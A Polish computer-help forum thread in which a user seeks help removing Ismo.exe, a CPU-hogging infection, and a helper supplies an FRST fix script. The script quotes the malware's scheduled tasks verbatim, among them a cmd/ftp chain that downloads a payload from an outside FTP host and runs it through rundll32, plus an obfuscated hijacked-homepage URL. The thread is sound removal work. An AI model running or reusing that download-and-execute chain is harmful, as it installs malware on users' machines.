Ismo.exe - Wirus

[derczy 0]

W odpowiedzi do tego wcześniejszego tematu: http://forum.pclab.pl/topic/1211266-Drastyczne-obci%C4%85%C5%BCenie-procesora/

 

FRST:

 

http://wklej.to/V79eH

 

Additional:

 

http://wklej.to/kzaTx

 

Shortcut:

 

http://wklej.to/tu3wY

 

Bardzo proszę o sprawdzenie logów. Z góry dziękuje za pomoc.

[filutka78 11]

Ism.exe czy Ismo.exe?

 

1) Uruchom FRST. NA klawiaturze naciśnij jednocześnie CTRL+Y.Otworzy się Notatnik - wklej do niego:

WMI_ActiveScriptEventConsumer_fuckyoumm2_consumer: <==== ATTENTION

ShortcutWithArgument: C:\Users\dre\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%

ShortcutWithArgument: C:\Users\dre\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%

ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP%

Task: C:\Windows\Tasks\OKLSFNHD1.job => C:\ProgramData\SecurityUtility\SecurityUtility.exe <==== ATTENTION

Task: {101B1901-AB73-49CC-B477-6B1A5C00EEDA} - System32\Tasks\Mysa2 => cmd /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION

Task: {15D5ED4E-B70C-440A-B44C-06DEFDA652FB} - System32\Tasks\ok => Rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa

Task: {1A1A7416-84A5-47CD-BDF8-ACB0F26B5D35} - System32\Tasks\{93AF70E0-4160-4CEF-B68D-1C855933EEF7} => pcalua.exe -a "D:\Torrent\The Sims 3 All In One Edition (Including Into The Future EXP)\The_Sims_3_Into_The_Future-FLT\gra\Sims3EP11Setup.exe" -d "D:\Torrent\The Sims 3 All In One Edition (Including Into The Future EXP)\The_Sims_3_Into_The_Future-FLT\gra"

Task: {6F853B3B-9A51-4BFA-BC21-BAEEA36BF59B} - System32\Tasks\{5A8A834F-002C-4520-8F85-1B1395B5F0D7} => pcalua.exe -a "C:\Program Files (x86)\Nox\bin\Nox_unload.exe"

Task: {7DA0AD55-0AE7-4008-B30F-2814679C4122} - System32\Tasks\Mysa1 => Rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION

Task: {7ECB69E0-F6B4-4293-B9A6-9BEFC999EBDF} - System32\Tasks\OKLSFNHD1 => C:\ProgramData\SecurityUtility\SecurityUtility.exe <==== ATTENTION

HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{2b792007-e155-455b-a1c9-9224ccaaceb5} <==== ATTENTION (Restriction - IP)

CHR HomePage: Default -> hxxp://%66%65%65%64.%73%6E%61%70%64%6F.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBFnkdYvIvvwfEYzwmkwM3HPmqx4h7hT3aQhazFP7JjUpTyI8SQKNWzeqHlWdVD8vkoyOaCe_2Dhp5-7UyKbhIaNrK3pAqyCUL604fVFqxbQ_7AkXar2KhjTsUXYUmB4bo-lNGukSMBEqGsm_chXyqpjCJmWdiaiZu40s5ShCDelYE3PpC1G_s,

S2 WsDrvInst; C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone for Android (CPC)\Library\DriverInstaller\DriverInstall.exe [X]

File: C:\Windows\system32\p

File: C:\Windows\system32\s

File: C:\Windows\system32\0

File: C:\Windows\0

File: C:\Windows\SysWOW64\0

HOSTS:

EmptyTemp:

Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW).

Daj z tego raport.

 

2) Zrób nowe logi FRST.

 

F.

[derczy 0]

Poniżej raport:

 

http://wklej.to/2p3l8

 

FRST:

 

http://wklej.to/rDwH4

 

Ism.exe czy Ismo.exe?

 

Prawdopodobnie Ismo.exe, choć nie jest pewien czym jest Ism.exe. Ale po usunięciu Ismo.exe, jako procesu mój komputer wrócił do normy, a sam ten proces pobierał najwięcej zasobów, tak więc był odpowiedzialny za obciążenie procesora. Nie wiem jak teraz, na razie jest w porządku. Fakt, że problem pojawia się dopiero po jakimś czasie od uruchomienia komputera lub jego pracy. Nie wykluczam, że te procesy mogą być ze sobą powiązane, ale nie mam pojęcia za co on jest odpowiedzialny, także trudno mi to stwierdzić.

[filutka78 11]

CHR HomePage: Default -> hxxp://%66%65%65%64.%73%6E%61%70%64%6F.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBFnkdYvIvvwfEYzwmkwM3HPmqx4h7hT3aQhazFP7JjUpTyI8SQKNWzeqHlWdVD8vkoyOaCe_2Dhp5-7UyKbhIaNrK3pAqyCUL604fVFqxbQ_7AkXar2KhjTsUXYUmB4bo-lNGukSMBEqGsm_chXyqpjCJmWdiaiZu40s5ShCDelYE3PpC1G_s,

Tego FRST nie jest w stanie zmienić.

Trzeba ręcznie:

Uruchom Google Chrome

> Naciśnij klawisze: lewy Alt+F i kliknij przycisk Ustawienia >

> Sekcja: Po uruchomieniu > wybierz: Otwórz konkretną stronę lub zestaw stron >

> Kliknij: Wybierz strony >

> Usuń: tę dziwną stronę, wpisz nowy adres strony głównej i kliknij przycisk OK.

 

Na obrazku, w Twoim pierwszym temacie, widoczny jest tylko proces Ism.exe.

 

Uruchom FRST.

W polu SEARCH (SZUKAJ) wklej:

Ism.exe; Ismo.exe

kliknij na przycisk "Search Files (Szukaj Plików)".

Raport z tego będzie tam, gdzie jest FRST.

 

 

F.

[derczy 0]

Nie ma takiej strony w Google Chrome. Za każdym razem otwiera mi się domyślna, podobnej nie widzę w ustawieniach.

 

Tutaj jest widoczny Ismo.exe. Tak jak wspomniałem, po usunięciu go z tego miejsca, procesor ustabilizował się. Ale pewnie było to tylko jego chwilowe wyłączenie.

 

 

Raport z FRST:

 

http://wklej.to/H2JpQ

[derczy 0]

Jakieś pomysły? Problem pojawia się w dalszym ciągu. Tutaj jeszcze coś z procesu Ismo, może pomoże.

 

 

PS. Znalazłem problem i usunąłem. Zobaczymy czy to przyniesie rozwiązanie. Skorzystałem Emisoft Emergency KIT, który w kilka sekund znalazł Ismo.exe, a przy okazji jeszcze kilka podobnych wirusów oraz trojanów.

 

 

Tego Malwarebytes to sobie mogę chyba w dupę wsadzić, który skanował, skanował i nic nie znalazł. Odinstalowuje i pozostawiam Emisoft, polecam.

[Gość]

Sprawdź plik procesu na virustotal Mój link. Prawym myszki na proces i wybierz "Otwórz lokalizację pliku" żeby go zlokalizować na partycji C:.

[derczy 0]

Problem jest taki, że w katalogu ani procesach go nie ma. Widoczny jest jedynie w "Monitorach zasobu", a tam nie ma takiej opcji. Po kwarantannie usunąłem go, ale teraz został znów wykryty i ponownie dodany do kwarantanny. Pojawia się najwyraźniej po każdym uruchomieniu komputera, więc problem musi być gdzieś głębiej.

[derczy 0]

Analiza pliku Ismo.exe: https://www.virustotal.com/pl/file/981528cbeafd245f003c838e0db3fb55d755b447631b0472fd2c164de72dcaee/analysis/

 

Jak usunąć to gówno? Ma ktoś jeszcze jakieś pomysły?